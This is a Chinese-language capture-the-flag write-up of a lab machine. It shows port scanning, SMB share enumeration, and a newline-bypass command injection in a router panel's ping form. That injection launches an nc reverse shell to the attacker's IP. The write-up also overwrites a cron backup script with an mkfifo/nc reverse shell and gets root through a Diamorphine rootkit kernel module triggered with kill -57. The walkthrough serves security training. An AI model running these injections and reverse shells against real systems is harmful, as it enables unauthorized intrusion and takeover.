端口扫描

nmap --min-rate=10000 -p- 10.10.114.27
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 14:22 UTC
Nmap scan report for ip-10-10-114-27.eu-west-1.compute.internal (10.10.114.27)
Host is up (0.0084s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 02:AB:07:41:29:CF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.13 seconds
nmap -sV -sT -sC -O -p22,80,139,445 10.10.114.27
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 14:23 UTC
Nmap scan report for ip-10-10-114-27.eu-west-1.compute.internal (10.10.114.27)
Host is up (0.00047s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3bc8f813e0cb42600df64cdc55d83bed (RSA)
|   256 1f42e1c3a5172a38693e9b736dcd5633 (ECDSA)
|_  256 7a67598d37c56729e853e81edfb0c71e (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Athena - Gods of olympus
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:AB:07:41:29:CF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: ROUTERPANEL, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2023-12-26T14:23:24
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

SMB

smbmap -H 10.10.114.27
[+] IP: 10.10.114.27:445        Name: ip-10-10-114-27.eu-west-1.compute.internal        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        public                                                  READ ONLY
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.15.13-Ubuntu)

有一个可读的共享,里面有一张小纸条。告诉了有一个/myrouterpanel目录

Gesthell

用于ping,确实可以ping到kali主机看一下命令执行。但是”,””&”之类的都被黑名单了,上换行符(%0A)。做个反弹shell

curl http://10.10.114.27/myrouterpanel/ping.php -X POST -d 'ip=%0A nc -e /bin/bash 10.11.38.245 444 &submit='

上pspy,发现有一个定时执行的/usr/share/backup/backup.sh,身份是athena

而且我们有可修改权限,写一个反弹shell进去,开启监听

echo '#!/bin/bash'>/usr/share/backup/backup.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.38.245 443 >/tmp/f'>>/usr/share/backup/backup.sh

现在我们是athena。做个ssh-keygen

提权

sudo -l发现可以无密码地执行:/usr/sbin/insmod /mnt/…/secret/venom.ko

可以将一个内核模块加载进linux内核中

可以先在靶机上开个web服务器来下载这个内核文件到ida进行逆向

其中有一个函数叫做diamorphine,是一个rootkit(隐藏在内核中的恶意软件)

放IDA中反编译一下,有一个give_root函数,发现在hack_kill中调用了它

只要向进程发送了57信号就可以获得root

运行sudo指令之后运行

kill -57 pid(随便写一个)

现在我们是root

碎碎念

md打到一半WP没保存,直接重写(恼。比较陌生的也就是rootkit和最后的内核之类的,了解一下其实还挺简单的,逆向也没什么难度。